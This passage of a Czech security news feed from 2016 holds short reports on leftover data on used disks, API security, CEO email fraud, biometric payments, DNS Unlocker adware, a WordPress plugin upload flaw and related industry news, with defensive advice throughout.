Výsledek je ohromující. V neuvěřitelných 78 % disků se objevují zbytková data, která by šla obnovit. Z celkového počtu náhodně vybraných 200 disků tak celých 156 alespoň nějaká data obsahuje.

Jen o něco méně, 67 %, tedy 134 disků, obsahuje data osobní: fotografie, životopisy, finanční údaje. Pokud by dostaly do špatných rukou, mohly by vést až k ukradení identity a dalším podvodům, varuje firma.

Již rozumnější číslo, 22 disků, tedy 11 %, zahrnuje i data firemní: Emaily, tabulky, zákaznické informace.

Vydaná studie výtečně podtrhuje existující bezpečnostní vady s elektronikou z druhé ruky. Předchozí majitelé často nevymažou správně všechna data uvnitř. Kupříkladu digitální fotokopírky se občas předprodávají i přesto, že mají v paměti stále ještě všechny dokumenty, které kdy oskenovaly.

Staré HDD mohou být přímo zlatým dolem pro hackery. Smazání dat se může zdát majiteli jednoduché, ale pouhé přesunutí souborů do koše opravdu nestačí, varuje Blancco ve své studii.

V jiných případech uživatel využije funkci rychlého formátování, která je však podobně neúčinná: Tento způsob data nevymaže natrvalo, pouze je nechá skryté, avšak obnovitelné, píše se v textu.

Ze všech prozkoumaných disků mělo pouhých 10 %, tedy 20 disků, všechna data bezpečně vymazána, popisuje firma. Uživatelům tak radí použít patřičný software ke správnému odstranění všech souborů.

Tyto nástroje mohou např. veškerou paměť disku dočasně zahltit nesmyslnými informacemi: Tím zajistí, že žádná zbytková data uživatele nebudou obnovitelná.

Blancco studii provedla v prvním čtvrtletí tohoto roku, většina disků byla klasickými HDD.


Nepodlehněte nebezpečným rozhraním API

27.7.2016 Zdroj: SecurityWorld Hrozby
Podle webu programmableweb.com v současné době existuje více než 13 700 veřejně dostupných rozhraní API. Ne všechny jsou ale bezpečné. Jaké kroky byste měli udělat, aby se mohly obavy rozplynout?
Mnoho zákazníků kaváren Starbucks bylo šokovaných, když se zjistilo, že kyberzločinci kradou peníze z jejich kreditních karet a platebních účtů tím, že se vlomí do jejich mobilních aplikací Starbucks.

Příčinou byla pravděpodobně díra v rozhraní API, přestože nebyla na webu Starbucks, ale v další aplikaci, kde došlo ke krádeži a použití zprofanovaných hesel.

Web Moonpig s blahopřáními a mobilní aplikace Snapchat měly podobný osud v důsledku rozhraní API, které řídí způsob komunikace aplikací mezi sebou a s daty, se kterými aplikace pracují.

Nedávno způsobilo nezabezpečené rozhraní API, že web Moonpig vystavil osobní záznamy a dílčí údaje o kreditních kartách svých tří milionů zákazníků. Dva exploity v rozhraní Snapchat API zase hackerům dovolily zjistit souvislost mnoha telefonních čísel se jmény a vytvořit miliony falešných účtů.

API láká hackery

Proč se rozhraní API tak často stávají cílem hackerů? Protože jsou všude, uvádí Randy Heffner, analytik zabezpečení ve společnosti Forrester Research. Každá firma si vytváří své rozhraní API pro podporu svého webu či mobilní aplikace, protože jim to umožňuje rychlejší inovace a integraci vnějšího obsahu.

Salesforce.com generuje 50 procent svých příjmů právě prostřednictvím rozhraní API, Expedia.com generuje dokonce 90 procent a také eBay uvádí, že 60 procent jeho příjmů pochází z rozhraní API.

„Širší pozornost věnovaná rozhraním API dává hackerům nové a zajímavější pole působnosti,“ vysvětluje Heffner.

Většina rozhraní API je k dispozici komukoli z internetu, protože běží na webových serverech. Stejně jako webové stránky mohou být i rozhraní API předmětem zkoumání a procházení od vyhledávacích botů či hackerů.

Zabezpečení API je tedy oblastí, která vyžaduje specifický podnikový pečlivý dohled, dodává Heffner.

„Nechceme rozhraní API připomínající ponorky, běžící tiše a s hloubkovým ponorem, protože pokud jednou někdo pronikne na váš web, zjistíte to velmi rychle. Pokud však někdo pronikne do vašeho API, nemusíte to zjistit vůbec.“

Důvody zranitelností

Proč se ale v rozhraních API vyskytují chyby zabezpečení? Vývojáři nebývají dostatečně zdatní v oblasti zabezpečení a rychlost uvádění na trh ovlivňuje veškeré testování a péči, kterou mohou programátoři věnovat svému kódu.

„Tráví mnohem více času přinášením hodnot do aplikací než péčí o jejich zabezpečení, což může vést ke vzniku bezpečnostních děr,“ vysvětluje Allyn Fay, technický marketingový manažer společnosti Ping Identity, která je dodavatelem systémů pro správu identit a přístupu.

Také mezi samotnými vývojáři rozhraní API se velmi málo komunikuje, což brání vzniku širších bezpečnostních standardů.

„V každé společnosti mají všechny obchodní jednotky mandát publikovat rozhraní API, a přitom vzájemně spolu nekomunikují,“ tvrdí Subra Kumaraswamy, šéf zabezpečení produktů ve společnosti Apigee, která vyvíjí rozhraní API.

„Pokud jsem jednotka, která zajišťuje dodávky, nebo platební společnost vytvářející platební rozhraní API,“ nebavíme se o tom mezi sebou, dodává Kumaraswamy.

A co víc, vývojáři jsou pod tlakem, aby rychleji inovovali, což může také vytvářet zranitelnosti, uvádí Kumaraswamy. „Můžete dělat chyby ať už tím, že neúmyslně způsobíte únik dat nebo že do rozhraní API nedáte ty správné kontroly.“

Tady jsou příklady kroků, které byste měli učinit, pokud chcete, aby byla vaše rozhraní API bezpečná.

1. Ucpávání děr

Vývoj aplikací nevykazuje nějaké známky zpomalení, ale firmy mohou podniknout kroky k ucpání děr v rozhraních API.

Když přijde na zabezpečení aplikací a rozhraní API, „ve webových aplikacích obvykle musíte jen ověřit totožnost koncového uživatele. Ve světě rozhraní API musíte také autentizovat aplikaci,“ uvádí Kumaraswamy.

„Pokud například používáte AirBnB nebo aplikaci Uber, tato řešení volají svá rozhraní API, takže tím dochází k jejich autentizaci.“ V případě webu Moonpig došlo k vynucování autentizace, ale ne autorizace, dodává Kumaraswamy.

Použití standardizovaného protokolu, který existuje jak pro autentizaci, tak i pro autorizaci, je základem k bezpečnému používání rozhraní API, dodává Fay.

Pokud to uděláte správně, bude rozsah integrovaného zabezpečení založen na standardu a nebude se v různých aplikacích lišit.

2. Šifrování přenosů

Vždy šifrujte citlivá data, radí Heffner. Nikdy nevytvářejte bezpečnostní díru tím, že byste používali přenosy přímo čitelného textu.

Vývojáři by měli používat SSL certifikáty pro webová rozhraní API, která přenášejí citlivé informace mezi programem v koncovém bodu a rozhraním webové služby, protože hackeři mohou tato data odposlouchávat.

Pokud použijete své rozhraní API v rámci podadresáře své aktuální webové aplikace, můžete použít stejný bezpečnostní certifikát, který máte pro své webové stránky.

3. Ochrana přihlašovacích údajů

Pochopte správně způsob správy přihlašovacích údajů pro aplikaci a jejich důležitost pro jednotlivé druhy scénářů, dodává Heffner.

„Kdybych byl bankou vykonávající finanční transakce s partnerem, existuje řada vrstev připojení, které bych chtěl mít – jako je VPN na SSL – nebo bych používal digitálně podepsané tokeny SAML apod. jako součást úplného bezpečnostního systému,“ tvrdí Heffner

Podle něj, když se použije více bezpečnostních mechanismů, ztěžuje to náročnost a počet úkonů, které musí někdo udělat, když chce takové spojení odposlouchávat.

Digitálně podepsané tokeny také mohou být jednou ze součástí bezpečnostního systému. Tokeny jsou řetězce znaků, které jednoznačně identifikují uživatele. Lze je ukládat v databázi a poskytnout přístup jen v případě, že uživatel zadá správné uživatelské jméno a heslo.

Token se potom použije uživatelem rozhraní API k přístupu k metodám rozhraní API.

4. Vyhněte se statickým a vestavěným heslům

Když je logika vestavěná do aplikace, je velmi těžké to změnit, vysvětluje Fay. Chcete-li změnit zásady nebo zaktualizovat zabezpečení, není vestavění veškeré této logiky do mobilních aplikací úplně dobrou věcí.

Vývojáři si někdy zjednodušují život obyčejnými hesly nebo ukládáním ID a hesel místně v mobilní aplikaci, a to je z bezpečnostního hlediska obrovský problém. „Statická hesla by se opravdu neměla používat,“ připomíná Fay.

5. Svému rozhraní API předávejte jen nutné informace

Vývojáři často vezmou všechny informace, které mají o uživateli, a předají je rozhraní API, protože nevědí, jaká data jsou třeba, říká Fay.

„Zajistěte, abyste přenášeli jen takové informace, které potřebujete,“ doporučuje Fay a dodává: „Je to více záležitost soukromí než zabezpečení,“ ale může to být zneužívané v metodách sociálního inženýrství.


Podvodné e-maily hackerům vydělávají miliardy dolarů

27.7.2016  Zdroj: SecurityWorld Spam
Americká FBI varuje pod podvodnými e-maily. Agresivita útočníků za půl druhého roku výrazně stoupla.
Podvodné emaily představují evidentně výdělečný byznys. Podle posledních statistik americké FBI si jejich původci, často se vydávající za ředitele společností, vydělali minimálně 3,1 miliardy dolarů.

Zprávy, které podvodně přimějí zaměstnance společností k odeslání financí na konto hackerů, jsou podle varovného reportu FBI rozšířené po celém světě. A množství peněz, které se podvodníci pokusili takto získat, prý od ledna loňského roku vzrostlo o 1300 %.

Jen v samotných Spojených státech tak důvěřivci přišli za poslední tři roky o 960 milionů dolarů, přičemž počet obětí v globálu přesáhl 22 tisíc. Scénář je v mnoha případech stejný: podvodníci se vydávají za výkonné manažery společnosti (dle bezpečnostní společnosti Trend Micro je takových až třetina) nebo za dodavatele, což se jim snadno daří prolomením zabezpečení a napíchnutím se do e-mailových účtů skutečných manažerů, odkud pak posílají klamavé zprávy s žádostmi o provedení platby.

Proto se pro tento druh kyberzločinu vžilo označení „CEO Fraud“ (Ředitelský podvod) či „The Supplier Swindle“ (Dodavatelský švindl). V jiných případech se podvodníci ani do účtů těch, za které se chtějí vydávat, nenabourávají a jednoduše si vytvoří účet podobný. Jsou i případy, kdy se vydávají například za právní zástupce a naléhají na oběť, ať jim zašle finance za důvěrné právní služby.

A jako pojistku prý někteří přidávají i ransomware atak v podobě e-mailu se škodlivou přílohou nebo odkazem směřující na škodlivé stránky.

Podle FBI tímto způsobem řádí v 79 světových zemích, většina podvodných účtů je však registrována v Číně a Hong Kongu. FBI má přitom za to, že podvodníci své cíle před útokem důkladně sledují, zaměstnanci by proto měli být opatrní, jaká data a profesní informace sdílejí na sociálních sítích.

Spamy by v žádném případě neměli otevírat a jakékoliv transakce by měli ověřit ideálně přímým telefonátem s příjemcem částky.


Jak nejlépe vysvětlit bezpečnostní rizika

27.7.2016 Zdroj: SecurityWorld Zabezpečení
Šéfové zabezpečení informací již nějakou dobu slyší, že by se měli naučit lépe „mluvit, aby jim ostatní v podniku rozuměli“. Je to jeden ze způsobů, jak lze získat respekt a předejít riziku být vnímaný především jako někdo, na koho se svalí veškerá vina v případě výskytu problému.
Pro ty, kdo přemýšlejí o způsobu, jak lépe vysvětlit podstatu problému firemního zabezpečení, přináší rady Chris Wysopal, spoluzakladatel a technický ředitel společnosti Veracode.

Níže uvedené poznatky byly jádrem Wysopalovy přednášky nazvané „Perspektiva ředitele zabezpečení informací při jednání s vedením firmy o kybernetické bezpečnosti“ na letošní konferenci RSA v San Francisku.

Změna myšlení

Prvním krokem je podle něj naučit se myslet jako vůdce podniku namísto „někoho, kdo jen spravuje technologie zajišťující provoz firmy“.

Uznává, že ještě tak před třemi až čtyřmi roky to byla primární role šéfa zabezpečení informací.

„Tato pozice se však mění způsobem, který zvyšuje její viditelnost pro nejvyšší vedení firmy. Teď jsou tito lidé lídry dohlížejícími na podniková oddělení při zavádění aplikací SaaS. Musejí ale přitom spolupracovat s dalšími odděleními, která mají na starost právo, předpisy, vztahy s veřejností atd.,“ říká Wysopal.

Kromě toho „se také mění sféra hrozeb“, popisuje Wysopal a dodává: „Existují věci mimo kontrolu šéfa zabezpečení informací, jako jsou například dodavatelský řetězec nebo poskytovatelé různých služeb. Používání technologií umožňuje růst podniku, ale také to přináší zvýšení rizika.“

Vedení firem konečně bere tato rizika více na vědomí. A tak zatímco se nároky a tlak na šéfa zabezpečení zvyšují, vznikají tím také další příležitosti.

„Připravenost na narušení a reakce na narušení jsou žhavá témata,“ uvádí Wysopal. „V důsledku toho jsou viditelnost, připravenost a plán pro vztahy s veřejností definitivně záležitosti, které nejvyšší vedení firmy zajímají.“

Konkrétní rady pro komunikaci

Aby bylo jisté, že budou naslouchat, nabízí Wysopal konkrétní radu – začít stručně, protože v praxi mívá šéf zabezpečení informací na přesvědčování obvykle jen cca 15 minut.

Toto přesvědčování není vhodné založit na nějakých tabulkách, grafech a technických pojmech – tedy záležitostech, které netechniky nedokážou plně zaujmout.

„Jsou to inteligentní lidé, ale nejsou obvykle technicky orientovaní,“ upozorňuje Wysopal. „Myslete tedy v pojmech, jako byste mluvili se svou matkou.“

Jeho krátký seznam komunikačních dovedností pro ředitele zabezpečení informací zahrnuje následující rady:

Nepoužívejte akronymy jako DDoS. Používejte slova, a nikoli pouhá písmena.
Používejte vizualizaci, a ne text.
Používejte čísla, zejména finanční vyjádření, například ztráty vznikající z úniku dat, aby členové vedení dokázali srovnávat rizika s náklady.
Používejte přirovnání k něčemu podobnému, co manažeři znají.
Vysvětlete, jak funguje školení. Můžete například měřit efektivitu školení týkajícího se phishingových útoků.
Ptejte se členů vedení, co chtějí získat od svých plánů pro zabezpečení informací.
Zdůrazněte, že neexistuje žádná organizace, která by se nemusela obávat narušení bezpečnosti.
Zdůrazněte, že se podnikové zabezpečení musí implementovat do celého podniku: Je třeba zaangažovat nejen oddělení IT, ale také právní, produkční a oddělení vztahů s veřejností.
Kybernetická bezpečnost musí být pro přežití značky záležitostí dlouhodobé strategie.
Wysopal upozorňuje, že šéfové zabezpečení také musejí vysvětlovat úroveň rizika v pojmech, kterým budou členové vedení firmy rozumět. To znamená zmínit narušení v podobných oborech a popsat, jak k nim došlo.

Také to znamená vysvětlit, kdo může zvenku zaútočit na vaši konkrétní firmu a proč. Co by pravděpodobně chtěli útočníci získat?

„U maloobchodníků je to docela jasné,“ vysvětluje Wysopal. Není žádným překvapením, že chtějí získat informace o platebních kartách. Ve zdravotnictví chtějí informace, které lze přiřadit ke konkrétním lidem, a podobně.

„Hrozba tedy souvisí s vaší činností. Co by chtěl útočník zpeněžit?“

Vypíchnutí největších rizik

Nakonec Wysopal připomíná, že by šéf zabezpečení informací měl „vysvětlit pět nejdůležitějších rizik pro svou firmu a ukazatele, které informují o úrovni, na jaké je jim firma vystavená“.

Mělo by se také určit, zda mají rizika tendenci růst, klesat nebo zůstávají stejná.

„A konečně by tito manažeři měli rovněž vysvětlit, jak jejich společnost tato rizika spravuje a udržuje je v přijatelných mezích,“ uzavírá Wysopal.


Otisky prstů? Zastaralé; do módy přijde snímání duhovky

27.7.2016 Zdroj: SecurityWorld Biometrika
Okolo inovativních platebních systémů z roku 2014 typu Apple Pay nebo Samsung Pay byl sice zpočátku obrovský humbuk, ale růst tomu neodpovídal. To by však mohly změnit nové biometrické bezpečnostní technologie, které překonají klasický „fingerprint“ systém, tedy sken otisků prstů.
Mezi takové nové metody by mohla patřit čtečka žilního řečiště v dlani nebo i takové senzory, které rozpoznají uživatelův styl psaní či pohybu.

Pro nákupy v internetovém prostředí by zase mohla nastoupit autentizace pomocí oční duhovky. A i když většina bank stále užívá SMS zprávy pro potvrzení transakce, hledají novější a bezpečnější metody; a tady se dostávají do hry kombinovaná řešení – tak například obličejový, hlasový a behaviorální sken najednou by připustil jen opravdu minimální šanci na zneužití.

Prodejci chytrých telefonů a developeři platebních systémů také musí brát v úvahu kombinovaná řešení a dát do praxe nové biometrické technologie, myslí si Tiffany Huangová, analytička v podniku Lux Research. Nedávno zveřejnila padesátistránkovou zprávu, týkající se právě zabezpečení mobilních plateb pomocí biometrických snímačů.

„Biometrika je nutná k vylepšení systému mobilních plateb,“ sdělila Huangová v interview. „Těžko zvítězí jen jediný typ biometrického řešení, alespoň ze střednědobého až dlouhodobého hlediska.“

Jeden z důvodů pomalého nasazení mobilních plateb ve Spojených státech i jinde po světě je především to, že uživatelé nevidí přidanou hodnotu v používání mobilního zařízení namísto kreditní karty, dodává. Kreditní karty s čipy by nakonec mohly pomoci zvýšit zájem o platby přes mobilní telefon, ale zatím to nevypadá, že by rozdíl byl nějak markantní.

Jeden z amerických průzkumů z minulého roku, jenž se tázal 2 137 občanů, zjistil, že celých 75 % nepoužívalo mobilní telefon k platbě, protože jim přijde jednodušší zaplatit bankovkami či kreditní nebo debetní kartou. Také 59 % se bálo o bezpečnost a soukromí u svých transakcí.

Huangová provedla průzkum v desítkách firem, fungujících ve složitém ekosystému mobilních plateb, včetně např. bank a finančních institucí nebo hardwarových a softwarových vývojářů, a zhodnotila nové biometrické technologie z hlediska jednoduchosti použití, bezpečnosti a ceny. Kromě skenu otisků prstů hodnotila také snímání dlaňových žil, duhovek, elektrokardiogramů, hlasů a obličejů.

Rozmanitost biometrických řešení je důležité pro celé spektrum mobilních plateb: V obchodě by například zákazníci pravděpodobně nechtěli čekat ve frontě na hlasovou nebo obličejovou autentizaci. Huangová mezitím zjistila, že optimální by byly skeny dlaňových žil, ty však jsou bohužel velice drahé.

Jsou také relativně vzácné, neboť vyžadují velkou čtečku, která porovnává schémata žil v ruce, popisuje. Avšak na oplátku jsou snímky dlaňových žil stonásobně bezpečnější než skeny otisků prstů, neboť jsou unikátnější než otisky prstů a navíc se dají jen těžko zfalšovat, protože se nachází až pod kůží.

Čtečky otisků prstů, používané např. v Apple Pay nebo v Samsung Pay, jsou v současnosti stále ještě nejvyspělejší technologie a hardware pro ně je relativně levný. Jenže tyto senzory se dají, lidově řešeno, „oblbnout“, třeba duplikací otisků prstů, což je jedním z důvodů, proč finanční instituce hledají bezpečnější alternativy.

Jednou z možností by byl tzv. behavioral tracking – sledování chování uživatele. Využitím senzorů, které již ve většině mobilních telefonů jsou, jako je akcelerometr, gyroskop, dotykový displej nebo GPS, by uživatel mohl být autentizován vzorcem chování; zkrátka tím, jak s telefonem zachází.

U chytrých hodinek by zase mohl být rozpoznán pohyby zápěstí. GPS by kupříkladu mohla určit, zda lokalita nákupu sedí s běžnou rutinou uživatele. Huangová však zjistila, že taková autentizace vykazuje jen 80 – 90% přesnost; tedy nižší než u jiných typů biometrie. To by tedy vyžadovalo ještě přidání klasického hesla či jiné běžné autentizační metody.

Existuje množství malých startupů, které na behaviorálních senzorech pracují – například Biocatch, AimBrain, XYverify nebo Plurilock.

Ve své zprávě Huangová popsala, že právě mobilní průmysl bude klíčový v tom, které biometrické technologie budou populární. „Mnoho firem stále shání důkazy o tom, že zrovna tato konkétní biometrie je bezpečná,“ vysvětluje. Také shledala, že s tím, jak vznikají nové mobilní platební platformy, bude pro vývojáře technologií velmi těžké zařídit, aby trhu dominoval jen jediný typ biometrického snímání.

„Mobilní platby se neuchytily tak rychle, jak jsme si mysleli, ale letos by měly nastartovat,“ říká. „Jakmile bude biometrie dostatečně uchycena, aby ujistila uživatele a banky o její bezpečnosti, povede to k rychlému nárůstů plateb skrze chytré telefony.“

Kromě potvrzení toho, že biometrické technologie fungují, výrobci také budou muset upřít pozornost na adresování obav uživatelů o svoje soukromí.

„Existují obavy z narušení soukromí u biometriky jako takové, nejen u mobilních transakcí,“ zakončuje Huangová. „Někteří zákazníci nechtějí něco jako kameru u svých transakcí, protože to vytváří dojem Velkého bratra. Je pravda, že postoj uživatelů k biometrii je zatím zdrženlivý.“


Startupová společnost využívá umělou inteligenci k detekci kyberútoků – dřív, než se vůbec stanou

27.7.2016 Zdroj: SecurityWorld Zabezpečení
Prevence je lepší, než následné řešení potíží, věří společnost Cylance, která se zaměřuje na využití umělé inteligence k detekci a prevenci kyberútoků. Ve středu oznámila, že se jí podařilo vybrat celých 100 milionů dolarů (přes dvě miliardy korun) v Series D fázi financování. Novou peněžní injekci firma využije k rozšíření svých prodejních, marketingových a strojních oblastí.
Vlajková loď společnosti, nazvaná CylanceProtect, slibuje na umělé inteligenci založené zabezpečení koncových bodů, avšak za využití pouhého zlomku systémových zdrojů, vyžadovaných valnou většinou dnešních řešení. Tuto úsporu umožňují nové technologické inovace typu strojového učení.

Zatímco současné způsoby jako podpisy, heuristické algoritmy nebo sledování chování mají především reaktivní přístup, tj. reagují až na započatou hrozbu a vyžadují připojení k internetu, Cylance využívá umělou inteligenci k proaktivní analýze charakteristik souborů, a předvídá ještě před spuštěním na local hostu, zda jsou nebezpečné, nebo ne.

Detailněji: Cylance extrahuje miliony unikátních charakteristik kódu a analyzuje je proti naučeným statistickým modelům, aby odhalil cíle onoho kódu. Namísto spolehání se na porovnávání hashe a hashovací algoritmy, Cylance odhadne případné nekalé záměry souboru za méně než 100 milisekund. Spuštění souboru tak jde zabránit ještě v jeho rané fázi.

CylanceProtect ochrání proti různým systémovým a paměťovým útokům, spear phishingu (cílený phishing), zero day útokům, elevacím oprávnění, skriptům a nakaženým programům, říká Cylance. Eliminuje tak nutnost antivirového, detekčního a prevenčního softwaru. Připojení k internetu ani každodenní aktualizace nejsou nutné.

Podle firmy mají již přes tisíc zákazníků.

„Náš cíl změnit fungování zabezpečení koncových bodů pomocí strojového učení, abychom se díky němu naučili přemýšlet stejně, jako kyberútočníci, byl úspěšný,“ říká ředitel Cylance Stuart McClure. „Nyní musíme zajistit, že bude [náš program] vložen do rukou bezpečnostních expertů v podnicích, organizacích a vládách jak rychle to jen bude možné.“


Nová chyba ve Windows vás zahltí nechtěnou reklamou

27.7.2016  Zdroj: SecurityWorld Zranitelnosti
Nová verze malwaru DNS Unlocker umožňuje měnit výchozí konfiguraci DNS, díky čemuž může zasažené uživatele začít zásobovat nadměrnou reklamou.
Analytici Esetu detekovali novou verzi adwaru DNS Unlocker s unikátní schopností měnit výchozí konfiguraci DNS. Typickým příkladem, jak DNS Unlocker ovlivňuje napadený počítač, je zobrazování reklam, které jako zdroj uvádí DNS Unlocker, a několika variantami podvodných stránek upozorňujících na údajnou nákazu počítače.

„DNS útoky nejsou tak destruktivní – řekněme v porovnání s ransomwarem – a bývalo vždy jednoduché je eliminovat. U nové varianty DNS Unlocker to však už neplatí,“ říká Petr Šnajdr, bezpečnostní expert v Esetu.

Analytici zjistili, že nový typ DNS Unlocker dokáže oklamat operační systém Windows tak, aby zobrazoval jiné hodnoty nastavení DNS, než je tomu ve skutečnosti.

„V grafickém rozhraní se nadále zobrazuje, že používáte automaticky přiřazenou adresu DNS serveru, ale ve skutečnosti používáte adresu statickou. Stručně řečeno, jedná se o DNS útok, který si vynutí používání podvržených serverů DNS. Proto jde o problém, který je pro běžného uživatele velmi těžko řešitelný,“ tvrdí Šnajdr.

Základní problém prý spočívá v tom, jak systém Windows pracuje s DNS adresami. Podrobné informace o svých zjištěních proto Eset zaslal Microsoftu, který podle jeho slov uznal, že jde chybu, ale bohužel ji neklasifikoval jako potenciální zranitelnost.

"Jelikož úprava registru vyžaduje administrátorská práva, nepovažujeme tento problém za natolik nebezpečný, abychom ho řešili prostřednictvím servisu MSRC,“ odpověděli zástupci Microsoftu.

Možná preventivních opatření podle Esetu:

Nenechávejte uživatele s administrátorskými právy surfovat na internetu; pokud ano, pak pouze v nezbytných případech.
Pokud zaregistrujete nevyžádané reklamy, zejména v případě, pokud mají dole v patičce uveden původ DNS Unlocker, zkontrolujte si nastavení DNS serverů v pokročilém menu nastavení TCP/IP.
Pokud spatříte pop-up okno s nabídkou nějakého druhu podpory, buďte extrémně opatrní a před jakýmkoli dalším krokem si zkontrolujte nastavení DNS.
Pokud máte jakékoli pochybnosti o nastavení DNS, můžete odstranit podezřelé položky na kartě DNS na stránce pokročilých nastavení TCP/IP. Kontrolou počítače pomocí některých on-line skenerů lze také malware DNS Unlocker odstranit.
Dodržujte všechna základní pravidla pro bezpečné používání internetu, včetně toho, abyste používali kvalitní bezpečnostní řešení.


Výzkum: Zaměstnanci nedbají na bezpečnost

27.7.2016  Zdroj: SecurityWorld Hrozby
Dobrou zprávou je, že oproti loňsku výrazně vzrostl počet lidí, kteří k zajištění vzdáleného přístupu k datům používají bezpečné firemní nástroje. Špatnou zprávou je, že současně roste i počet lidí, kteří si stále práci domů posílají přes soukromý email.
Využívání firemního cloudu letos oproti roku 2015 výrazně vzrostlo (z 29 % na 43 %) a Česko se tak z loňských spodních příček dostalo na evropský průměr (45%). Téměř polovina (46 %) zaměstnanců si ale stále ještě posílá pracovní soubory na soukromý email, což je o 7 procentních bodů více než loni.

Využívání spotřebitelských úložišť se zdvojnásobilo (ze 14 % na 30 %). Soukromé maily ani běžná úložiště přitom nemohou zajistit potřebnou míru ochrany citlivých obchodních informací. Vyplývá to z nového ročníku průzkumu Náskok díky technologiím, který si nechal zpracovat Microsoft.

Lidé chápou nutnost dobře chránit informace, ke kterým na dálku přistupují. 9 z 10 šéfů a 79 % zaměstnanců zdůraznilo, že při práci mimo kancelář je nezbytné zajistit bezpečnost dat.

„Jenže praxe stále ještě pokulhává. Používání soukromých mailů pro sdílení pracovních dokumentů může pro firmy představovat časovanou bombu,“ uvedl Ondřej Novodvorský, ředitel pro malé a střední firmy z Microsoftu. "Do práce patří profesionální pracovní nástroje a platí to i o technologiích."

Není přitom řešním mobilitu omezovat. V letošním průzkumu uvedly téměř tři čtvrtiny (72 %) zaměstnanců českých SMB, že možnost pracovat mimo kancelář zvyšuje jejich produktivitu. Firmy by se jejím omezením připravily o důležitý zdroj výkonnosti, kreativity i nových obchodních příležitostí.

„Lidé dnes mobilně žijí a jsou zvyklí komunikovat a sdílet na dálku. Pokud firma svým zaměstnancům nenabídne bezpečné nástroje a nenaučí je správně používat, najdou si jinou cestu. A to může být pro bezpečnost firemních dat velký problém,“ řekl Ondřej Novodvorský.


Neopravená chyba ve WordPress pluginu ohrožuje tisíce webů

27.7.2016 Zdroj: SecurityWorld Zranitelnosti
Vada v zásuvném modulu Mobile Detector v oblíbeném systému pro správu obsahu umožnil hackerům nahrát škodlivá data na servery.
Během posledního týdne se útočníkům podařilo zneužít chybu, která se objevila v oblíbeném WP Mobile Detector pluginu, instalovaném na více než 10 tisíc webových stránkách.

Vývojář zásuvného modulu chybu opravil již v úterý ve verzi 3.6; uživatelé by se tak měli ujistit nejen, že mají nejnovější verzi pluginu, ale také, zda nejsou jejich stránky již napadeny.

Zneužití je možné díky skriptu zvaném resize.php a umožňuje vzdáleným útočníkům nahrávat soubory na webový server. Mezi takové soubory mohou patřit např. backdoor shell skripty, které hackerům poskytnou zadní vrátka přístupu na server a umožní jim vkládat části kódu na webové stránky.

Chybu objevil bezpečnostní systém Wordpressu PluginVulnerabilities.com poté, co sledoval requesty na soubor wp-content/plugins/wp-mobile-detector/resize.php, ačkoli ten na serveru neexistoval. To znamená, že někdo používal automatický sken, aby vyhledal tento konkrétní soubor, což obvykle bývá právě z důvodu možné zneužitelné chyby.

Výzkumníci z bezpečnostní agentury Sucuri, specializované na webové zabezpečení, analyzovali logy z firewallu společnosti a nalezli několik pokusů o zneužití chyby, začínaje 27. květnem; tedy čtyři dny před vydáním opravné aktualizace. Je však možné, že útočníci o vadě věděli již dříve.

WP Mobile Detector (pozor na záměnu s jiným, nenakaženým pluginem jménem WP Mobile Detect) měl na počátku května přes 10 tisíc aktivních instalací. Nyní se toto číslo smrsklo na pouhou pětinu, ale z části je to i proto, že po detekci chyby WordPress zásuvný modul na čas odstranil.

Aby útočníci mohli vadu v resize.php zneužít, musí server mít povolenu funkci allow_url_fopen. To do jisté míry limituje nebezpečnost závady.

Protože není jasné, kolik webových stránek bylo nakaženo, je dobrý nápad, jste-li uživatelem dané aplikace, zkontrolovat svůj server.

„Valná většina zranitelných stránek je nyní infikována spamem skrze doorway weby, odkazujících obvykle na pornostránky,” popisuje výzkumník ze Sucuri Douglas Santos. „Standardně najdete složku gopni3g v kořenovém adresáři, která obsahuje soubor story.php (která doorwaye umožňuje), .htaccess a podsložky se spam soubory a šablonami.”


Flowmon nabídne monitoring sítě i přes mobil

27.7.2016 Zdroj: SecurityWorld Zabezpečení
Flowmon Friday – to je název akce, v rámci které firma Flowmon Networks koncem května seznámila veřejnost s novými řešeními zaměřenými na monitorování a bezpečnost počítačových sítí. Partnerem konference baly IDG Czech Republic.
Během programu se návštěvníci mohli seznámit s novinkami v řešení Flowmon, jako je například nová architektura ukládání datových toků, větší viditelnost do aplikační vrstvy nebo rychlejší detekce incidentů, a vývojem technologie monitorování síťového provozu.

Vedle toho Pavel Minařík, technický ředitel Flowmon Networks, představil zbrusu novou mobilní aplikaci pro operační systémy iOS a Android. Díky ní mají uživatelé Flowmonu přehled o své síti kdekoliv a kdykoliv na svém mobilním zařízení.

Z řad technologických partnerů vystoupil na konferenci Jaromír Pilař z Cisco Systems, který se věnoval síťové infrastruktuře jako klíčovému prostředku pro detekci a kontrolu hrozeb.

Praktická nasazení a přínosy řešení Flowmon napříč různými segmenty pak postupně představili Miloš Němec z Kofoly, Aneta Coufalíková z Centra CIRC Ministerstva obrany, Daniel Dvořák z Vysoké školy chemicko-technologické v Praze a Filip Višenka ze Slovenské spořitelny.

Na konferenci byli také vyhlášeni nejúspěšnější partneři společnosti za rok 2015. Titul českého Distributora roku si odnesl Veracomp, partnerem roku pak společnost Dimension Data. Obě ocenění předal Zoltán Csecsödi, nový obchodní ředitel Flowmonu pro Českou republiku, jenž byl na konferenci oficiálně ve funkci představen.

„Příští rok to bude deset let existence Flowmonu. Z malého týmu se nám podařilo vytvořit úspěšnou společnost, které se daří růst u nás i v zahraničí,“ dodal Rostislav Vocilka, ředitel společnosti Flowmon Networks.


Mobilní platby: Zabezpečí vás při nich lépe hardware, nebo software?

27.7.2016 Zdroj: SecurityWorld Mobilní
Platební systémy se stále častěji dostávají do hledáčku obchodníků i uživatelů. Je ale jejich používání opravdu bezpečné? A které řešení se ukazuje jako vhodnější?
Google oznámil svou platformu Android Pay a jedná s operátory o předinstalaci tohoto systému do telefonů se systémem Android. Samsung zase o prázdninách v Evropě zprovoznil svůj vlastní platební systém Samsung Pay, PayPal se oddělil od firmy eBay a koupil dodavatele platební technologie, firmu Xoom.

Pro spotřebitele se rozhodnutí pravděpodobně zredukuje na to, zda mít telefon iPhone nebo Android a jaké aplikace je snadnější používat a jsou akceptované většinou obchodníků.

Obchodníci pokračují v implementacích podpory pro mobilní platby. Naštěstí se nebudou muset rozhodovat mezi podporou platforem Apple a Google – přidání podpory pro jednu automaticky znamená schopnost akceptovat druhou.

Ale co používané back-endové technologie? Jak na tom jsou z hlediska bezpečnosti? Podle bezpečnostních expertů existuje několik způsobů realizace a každý má své vlastní bezpečnostní důsledky.

Hardware versus software

